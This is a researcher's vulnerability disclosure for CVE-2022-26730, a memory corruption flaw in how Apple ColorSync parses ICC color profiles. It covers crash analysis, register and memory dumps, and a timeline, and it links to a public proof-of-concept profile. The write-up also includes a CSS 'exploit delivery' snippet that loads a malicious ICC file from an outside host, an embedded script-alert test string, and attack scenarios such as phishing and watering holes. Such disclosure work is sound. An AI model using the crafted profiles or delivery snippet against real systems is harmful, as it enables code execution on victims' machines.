Estimated reading time: 6 minutes
Table of contents
Executive Summary
CVE-2022-26730 | ColorSync | A memory corruption issue existed in the processing of ICC profiles. This issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13. Processing a maliciously crafted image may lead to arbitrary code execution.
Software Updates are available for Mac models: Mac Studio (2022), Mac Pro (2019 and later), MacBook Air (2018 and later), MacBook Pro (2017 and later), Mac mini (2018 and later), iMac (2017 and later), MacBook (2017), and iMac Pro (2017).
CVE-2022-26730
A memory corruption issue existed in the processing of ICC profiles
https://support.apple.com/en-us/HT213488
NIST CVSS 3.1 Severity and Metrics: 8.8 High
Prior Art
Google Project Zero identified an out-of-bounds read caused by integer overflows in the curve table initialization issue, which was documented in P0-2226. This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-30942.
The issue described in this report was found in the CMMLutTag::InitializeCurveTable method, as called by CMMLutTag::CMMLutTag during the initialization of A2B0/B2A0 tags of type mAB/mBA. The curve table consists of a number of curves of type ‘para’ (parametricCurveType) or ‘curv’ (curveType). The latter is represented in the color profile with the following structures (copied from https://www.color.org/icProfileHeader.h):
https://bugs.chromium.org/p/project-zero/issues/detail?id=2226
CVE-2022-26730 | ColorSync
TL;DR
CVE-2022-26730 | ColorSync | Found via PoC Replay of P0-2226 and disassembly of Patch for CVE-2021-30942
CVSS 3.1 Base Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Targets
- (1) ColorSync, Safari, Finder, Instruments and other Applications using ICC Profiles or Graphics Files with ICC Profiles on macOS 12
- (2) Apple Developer Instruments programs included memory bugs issues fixed in macOS 13.
- Result of Feedback Reports: 21E258 | 13E113 | Instruments | Crash | .icc | ColorSync | PoC | OE089308559899 | FB9970176 | FB9970191 | FB9971897
Bugs
Buffer Overflow
The ucr_string variable is allocated only 100 bytes, yet its length is being computed using strlen which can lead to buffer overflow if the string exceeds 100 bytes. An attacker can exploit this vulnerability to execute arbitrary code or crash the application.
Memory Leak
The ucrBgWrite variable is allocated dynamically using malloc, yet it is not being freed. If this code is called repeatedly, it could lead to memory exhaustion and potentially cause the system to crash.
Data Corruption
The memcpy function is used to copy the ucr_string into memory, yet it does not check the length of the data being copied. When the string_bytes
variable exceeds the available space in memory, several adverse consequences may occur. These include potential data corruption, memory access violation, or even a segmentation fault.
Integer Overflow
The ucr_nbytes and bg_nbytes variables are computed by multiplying the number of elements in the curve by the size of each element. If the number of elements in the curve reaches a significant magnitude, it can lead to integer overflow and subsequently trigger unexpected behavior.
Type Casting
The ucrCurve and bgCurve variables are being cast to icUcrBgCurve type, which assumes that the memory block contains a valid structure of that type. If the memory block is corrupted or does not contain a valid structure of that type, it could result in undefined behavior, including program crashes or memory access violations.
ICC Profile | ColorSync::CMMLutTag::InitializeCurveTable
CVE-2022-26730 | ColorSync makes use of several Objective-C method names (SetPlotColor:, SetPlotNone, SetPlotPara:Type:, and SetPlotData:entryCount:entrySize:) implementing control flows that involve checking values of several registers and jumping to different parts of the code based on those values that were User Controllable Inputs.
CVE-2022-26730
The Multi-localized Strings Code provided attack surface via buffer overflow as shown below:

ColorSync Vulnerability Analysis
The crash occurred in the ColorSync Utility application on macOS version 12.3. The crash occurred on March 29, 2022, while the application was running on an ARM-64 CPU.
The application (ColorSync Utility) crashed due to a segmentation fault. The crash occurred while executing the inputPopHit method of an NSPopUpButton control. The crash log also includes a kernel targe section with several VM – pmap_enter failed with resource shortage messages.
Vulnerable Code Highlights | CMMLutTag::InitializeCurveTable
CMMLutTag::InitializeCurveTable(CMMLutTag::CMMCurveTable&, CMMMemMgr&, unsigned int, unsigned int, CMMTagDataAccess*, unsigned int*) (in ColorSync)
X86_64 Disassembly of ColorSync::CMMLutTag::InitializeCurveTable
Shown below is the proof of concept [PoC] code for CVE-2022-26730 | ColorSync copied to the ColorSync::CMMLutTag::InitializeCurveTable function. The ColorSync::CMMLutTag::InitializeCurveTable function is responsible for setting some plot-related properties, such as color and type, based on input parameters.
The ColorSync::CMMLutTag::InitializeCurveTable function begins by saving the stack base pointer and then pushing the values of several registers onto the stack. It then allocates memory on the stack and initializes some local variables. The function then calls two other functions (SetPlotColor: and SetPlotNone) with input parameters rdi and rsi and stores the results in rsi and r14 on X86_64, respectively.
ColorSync::CMMLutTag::InitializeCurveTable::SetPlotData:entryCount:entrySize, SetPlotColor and others are User controllable Inputs to the curvParameters. A lack of proper input validation or sanitization leads to a situation where an attacker can control the value of the %eax register on X86_64 or s20 + s21 registers on arm64e. By providing a crafted input, an attacker can cause a crash or potentially execute arbitrary code with the privileges of the ColorSync Utility process.
arm64e s20 Register
0x6f004300 : o C
0x79007000 : y p
0x69007200 : i r
0x68006700 : h g
0x20007400 : t
0x30003200 : 0 2
0x32003200 : 2 2
0x44002000 : D
0x76006100 : v a
0x64006900 : d i
0x48002000 : H
0x79006f00 : y o
0x20007400 : t
0x70002200 : p "
0x69007200 : i r
0x74006e00 : t n
0x68002000 : h
0x6c006500 : l e
0x6f006c00 : o l
0x77002000 : w
0x72006f00 : r o
0x64006c00 : d l
0x20002200 : "
0x73003c00 : s <
0x72006300 : r c
0x70006900 : p i
0x3e007400 : > t
0x6c006100 : l a
0x72006500 : r e
0x28007400 : ( t
0x36003600 : 6 6
0x29003600 : ) 6
0x2f003c00 : / <
0x63007300 : c s
0x69007200 : i r
0x74007000 : t p
0x22003e00 : " >
Buffer Overflow
The memory contents at this buffer address are repetitive, with the same value (0x61006100) repeated multiple times. This value corresponds to the UTF-16 encoding of the character “a” twice:
(lldb) x/500
0x1c5c881cc: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c881dc: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c881ec: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c881fc: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8820c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8821c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8822c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8823c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8824c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8825c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8826c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8827c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8828c: 0x61006100 0x61006100
X86_64 Registers

Sample Profile
Graphical View of a PoC ICC Color Profile for CVE-2022-26730 | ColorSync showing the curveParameters using ColorSync:

CVE-2022-26730 | ColorSync | PoC
Attack Styles
WateringHole, SpearPhishing, EmailBomb, Cross Site Scripting, Other
The Public Domain CVE-2022-26730 | ColorSync PoC Released today is a hand rolled ICC to Crash ColorSync [macOS 12] on a Null Byte Read in the curv parameters at URL https://xss.cx/2022/11/05/icc/Crash-CoreFoundation-CFDataGetLength-ColorSync-Crash-PoC-hand-crafted-to-hit-null-page-0x00-public-domain.icc.zip
ICC Profile Fuzzing Container
// Example | Sample
<rdf:Description rdf:about='cve-2022-26730-arbitrary-code-execution-user-controllable-input.png'
...
<System:FileName>cve-2022-26730-arbitrary-code-execution-curv-input-parameters-unsanitized.png</System:FileName>
...
<File:FileType>PNG</File:FileType>
<File:FileTypeExtension>png</File:FileTypeExtension>
<File:MIMEType>image/png</File:MIMEType>
...
<PNG:RedX>0.64</PNG:RedX>
<PNG:RedY>0.33</PNG:RedY>
<PNG:GreenX>0.3</PNG:GreenX>
<PNG:GreenY>0.6</PNG:GreenY>
<PNG:BlueX>0.15</PNG:BlueX>
<PNG:BlueY>0.06</PNG:BlueY>
...
<PNG:Icccopyright>Copyright 2022 David Hoyt LLC</PNG:Icccopyright>
<PNG:Iccdescription>e-sRGB</PNG:Iccdescription>
<ICC-header:ProfileCMMType>Hoyt</ICC-header:ProfileCMMType>
<ICC-header:ProfileVersion>6.6.6</ICC-header:ProfileVersion>
...
<ICC_Profile2:AToB0 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:AToB0>
<ICC_Profile2:AToB2 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:AToB2>
<ICC_Profile2:AToB1 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:AToB1>
<ICC_Profile2:BToA0 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:BToA0>
<ICC_Profile2:BToA2 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:BToA2>
<ICC_Profile2:BToA1 rdf:datatype='http://www.w3.org/2001/XMLSchema#base64Binary'>
</ICC_Profile2:BToA1>
...
Use Case
Case #1: Attacker hand rolls an ICC Color Profile named bad.icc then Embedded in sample.png and Campaigned
Case #2 Attacker crafts HTML File with Reference to the Malicious ICC or Graphics Picture and Campaigned
HTML Exploit Delivery Container
@media color-gamut: p2{
@color-profile{ name: p3; src: url(hxxps://xss.cx/..path.part../icc/cve-2022-26730-arbitrary-code-execution-user-controllable-input-poc-1.icc); }
HTML Exploit Delivery PoC
Crash Reports
Timeline
- Keywords: CVE-2022-26730 | ColorSync | ICC Color Profile, User Controllable Input, Input Validation, Mac, PoC
- Operating System: macOS 12
- Vendor Notification: March 2022
- Vendor Resolution: October 2022
- Vendor Fix: This issue was addressed with improved input validation by Apple
- Vendor Source: https://support.apple.com/en-us/HT213488
- Published: 10/31/2022
- (Data Abort) byte read Translation fault
- Bug Type == Incomplete Fix
Knowledgebase
https://bugs.chromium.org/p/project-zero/issues/detail?id=2226
Issue 2226: Apple ColorSync: out-of-bounds reads due to integer overflows in curve table initialization
https://bugs.chromium.org/p/project-zero/issues/detail?id=2225
Issue 2225: Apple ColorSync: use of uninitialized memory in CMMNDimLinear::Interpolate
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26730
https://nvd.nist.gov/vuln/detail/CVE-2022-26730
You must be logged in to post a comment.